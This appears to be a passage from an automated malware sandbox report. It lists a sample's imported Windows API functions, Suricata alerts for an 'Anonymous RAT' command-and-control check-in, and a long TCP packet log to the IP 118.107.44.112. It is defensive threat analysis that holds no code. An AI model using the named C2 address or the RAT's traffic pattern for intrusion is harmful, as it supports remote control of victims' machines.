                                                                          USER32.dllCharUpperW, EndDialog, DestroyWindow, KillTimer, ReleaseDC, DispatchMessageW, GetMessageW, SetTimer, CreateWindowExW, ScreenToClient, GetWindowRect, wsprintfW, GetParent, GetSystemMenu, EnableMenuItem, EnableWindow, MessageBeep, LoadIconW, LoadImageW, wvsprintfW, IsWindow, DefWindowProcW, CallWindowProcW, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, DrawTextW, ShowWindow, SystemParametersInfoW, SetFocus, SetWindowLongW, GetSystemMetrics, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, wsprintfA, SetWindowTextW, GetSysColor, GetWindowTextLengthW, GetWindowTextW, GetClassNameA, GetWindowLongW, GetMenu, SetWindowPos, CopyImage, SendMessageW, GetWindowDC
                                                                          GDI32.dllGetCurrentObject, StretchBlt, SetStretchBltMode, CreateCompatibleBitmap, SelectObject, CreateCompatibleDC, GetObjectW, GetDeviceCaps, DeleteObject, CreateFontIndirectW, DeleteDC
                                                                          SHELL32.dllSHGetFileInfoW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteExW, SHGetSpecialFolderPathW, ShellExecuteW
                                                                          ole32.dllCoInitialize, CreateStreamOnHGlobal, CoCreateInstance
                                                                          OLEAUT32.dllVariantClear, OleLoadPicture, SysAllocString
                                                                          MSVCRT.dll__set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, memset, _wcsnicmp, strncmp, malloc, memmove, _wtol, memcpy, free, memcmp, _purecall, ??2@YAPAXI@Z, ??3@YAXPAX@Z, _except_handler3, _controlfp

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          ChineseChina
                                                                          RussianRussia
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-27T09:20:45.215284+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449782118.107.44.11218091TCP
                                                                          2024-12-27T09:21:56.244401+01002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.449793118.107.44.11218091TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 27, 2024 09:20:40.566216946 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:40.788098097 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:40.788182974 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.189259052 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189297915 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189307928 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189372063 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.189407110 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189418077 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189434052 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189446926 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189455986 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.189466000 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.189589024 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189599991 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189610958 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.189631939 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.189660072 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.308998108 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.309019089 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.309073925 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.316713095 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.316766977 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.316812038 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.398927927 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.399063110 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.399202108 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.403153896 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.403270960 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.403331041 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.411572933 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.411708117 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.411752939 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.420077085 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.420315981 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.420352936 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.428349972 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.428386927 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.428633928 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.436707973 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.436830997 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.436882973 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.445146084 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.445250988 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.445292950 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.453563929 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.453645945 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.454128981 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.461687088 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.461766958 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.461808920 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.469732046 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.469851017 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.470006943 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.477858067 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.477952003 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.477998018 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.608738899 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.609003067 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.609114885 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.611247063 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.611414909 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.611460924 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.616404057 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.616470098 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.616513968 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.624129057 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.624142885 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.624193907 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.626651049 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.626754045 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.626800060 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.631752968 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.631871939 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.632046938 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.636928082 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.637053967 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.637106895 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.642066002 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.642153025 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.642199039 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.647170067 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.647286892 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.647351980 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.652335882 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.652385950 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.652791023 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.659775019 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.659787893 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.659832954 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.662545919 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.662616968 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.662668943 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.667656898 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.667762041 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.667805910 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.672856092 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.672905922 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.672982931 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.677938938 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.678102970 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.678739071 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.683206081 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.683269978 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.683722973 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.688256979 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.688365936 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.688405991 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.693429947 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.693511009 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.693556070 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.698440075 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.698512077 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.698571920 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.703547955 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.703668118 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.703707933 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.708657980 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.759439945 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.818087101 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.818136930 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.818191051 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.819272995 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.819386005 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.819432974 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.823137045 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.823252916 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.823302984 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.826982021 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.827131987 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.827217102 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.830847979 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.830959082 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.831053972 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.834714890 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.834820032 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.834876060 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.838490009 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.838604927 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.838656902 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.842263937 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.842354059 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.842418909 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.845982075 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.846079111 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.846128941 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.849739075 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.849837065 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.849888086 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.853554010 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.853672028 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.853715897 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:42.857207060 CET1885249771118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:42.858139992 CET4977118852192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:45.092263937 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:45.211817026 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:45.211910963 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:45.215284109 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:45.334721088 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:46.767575979 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:46.776797056 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:46.896344900 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:46.896385908 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:46.896436930 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.564888954 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.564954042 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.564987898 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.564996004 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.565068007 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565114975 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.565129042 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565175056 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565216064 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.565220118 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565285921 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565315008 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565323114 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.565376043 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.565412998 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.573318005 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.618849039 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.684883118 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.728369951 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.776118040 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.776165009 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.776319027 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.780124903 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.780240059 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.780288935 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.788580894 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.788733959 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.788779020 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.796619892 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.796730042 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.796772957 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.805018902 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.805071115 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.805114031 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.813404083 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.813524961 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.813570976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.821832895 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.821888924 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.821970940 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.830219984 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.830348969 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.830408096 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.838597059 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.838731050 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.838778973 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.847050905 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.847161055 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.847203016 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.855423927 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.855509043 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.855554104 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.987423897 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.987581968 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.990107059 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.990221024 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.990222931 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.990267038 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:47.995516062 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.995637894 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:47.995686054 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.000931025 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.001085043 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.001132011 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.006350040 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.006519079 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.006568909 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.011769056 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.011920929 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.011970043 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.017229080 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.017371893 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.017415047 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.022622108 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.022739887 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.022778034 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.028142929 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.028207064 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.028253078 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.033499002 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.033557892 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.033601046 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.038881063 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.039035082 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.039076090 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.044333935 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.044441938 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.044481993 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.049725056 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.049763918 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.049810886 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.055159092 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.055219889 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.055260897 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.060602903 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.060719013 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.060782909 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.066016912 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.066133976 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.066184044 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.071449995 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.071635008 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.071681976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.076926947 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.077076912 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.077116966 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.082288980 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.134485006 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.198378086 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.198487997 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.198529005 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.200453997 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.201164007 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.201210976 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.201244116 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.205265045 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.205316067 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.205389977 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.209331036 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.209372997 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.209440947 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.213401079 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.213437080 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.213526964 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.217514992 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.217576027 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.217612982 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.221535921 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.221571922 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.221635103 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.225601912 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.225644112 CET4978218091192.168.2.4118.107.44.112
                                                                          Dec 27, 2024 09:20:48.225707054 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.229672909 CET1809149782118.107.44.112192.168.2.4
                                                                          Dec 27, 2024 09:20:48.229717016 CET4978218091192.168.2.4118.107.44.112
